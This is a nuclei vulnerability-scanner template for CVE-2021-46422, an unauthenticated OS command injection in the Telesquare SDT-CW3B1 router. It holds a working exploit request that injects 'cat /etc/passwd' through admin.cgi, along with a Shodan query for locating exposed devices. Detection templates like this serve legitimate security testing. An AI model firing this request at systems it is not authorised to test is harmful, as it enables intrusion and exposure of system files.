nuclei-templates/cves/2021/CVE-2021-46422.yaml

39 lines
1.1 KiB
YAML

id: CVE-2021-46422
info:
name: SDT-CW3B1 1.1.0 - OS Command Injection
author: badboycxcc
severity: critical
description: |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
reference:
- https://www.exploit-db.com/exploits/50936
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-46422
cwe-id: CWE-78
metadata:
shodan-query: html:"SDT-CW3B1"
verified: "false"
tags: cve,cve2021,injection,rce
variables:
cmd: "cat+/etc/passwd"
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/18